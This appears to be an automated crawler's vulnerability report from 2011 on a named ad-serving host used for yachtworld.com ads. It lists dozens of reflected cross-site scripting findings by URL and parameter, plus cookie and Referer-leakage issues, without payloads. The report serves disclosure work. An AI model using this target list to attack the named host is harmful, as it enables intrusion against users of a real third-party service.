oasc05139.247realmedia.com, XSS, Cross Site Scripting

XSS in Ad CDN Host | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Jan 28 07:39:17 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.7. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.8. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.9. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.10. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.11. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]

1.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.13. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.14. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.15. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.16. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.17. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.18. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.19. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.20. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.21. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.22. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]

1.23. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.24. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.25. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.26. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.27. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.28. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.29. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.30. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.31. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.32. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.33. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]

1.34. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.35. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.36. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.37. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.38. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.39. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.40. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.41. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.42. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.43. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.44. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.45. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.46. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.47. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.48. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.49. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.50. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]

1.51. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.52. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.53. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.54. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.55. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.56. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.57. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.58. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.59. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.60. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.61. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]

1.62. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.63. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 4]

1.64. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.65. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 5]

1.66. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.67. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 6]

1.68. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.69. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 7]

1.70. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.71. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [REST URL parameter 9]

1.72. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]

2. Cookie scoped to parent domain

2.1. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

2.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

2.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

2.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

2.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1248084167@Top1,Right1

2.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1304883875@Top1,Right1

2.7. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1401531553@Top1,Right1

2.8. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1590611172@Top1,Right1

2.9. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/openboatdetails.html/1984270322@Top1,Right1

2.10. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1209188999@Top1,Right1

2.11. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1673595005@Top1,Right1

2.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1960522682@Top1,Right1

2.13. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/en/opensearchresults.html/1976854735@Top1,Right1

2.14. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1206775208@Right1,Top1

2.15. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.yachtworld.com/us33d06/1452865909@Right1,Top1

2.16. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

2.17. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

2.18. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

2.19. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

2.20. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c

2.21. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c

2.22. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c

2.23. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c

3. Cross-domain Referer leakage

3.1. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/198824290/Right1/Boats/galati2-yen-as/galati2-maritimo-sky.gif/7263485738303033424c73414270536c

3.2. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

3.3. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

3.4. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

3.5. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

3.6. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

3.7. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

3.8. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c

3.9. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c

3.10. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c

3.11. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

3.12. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c

3.13. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

3.14. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

3.15. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

3.16. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

3.17. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/275086285/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-mtn-sky.gif/7263485738303033424c73414270536c

3.18. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/423429032/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

3.19. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/779597469/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

3.20. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c

4. Cookie without HttpOnly flag set

4.1. http://oasc05139.247realmedia.com/RealMedia/ads/

4.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

4.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

4.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

4.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

4.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

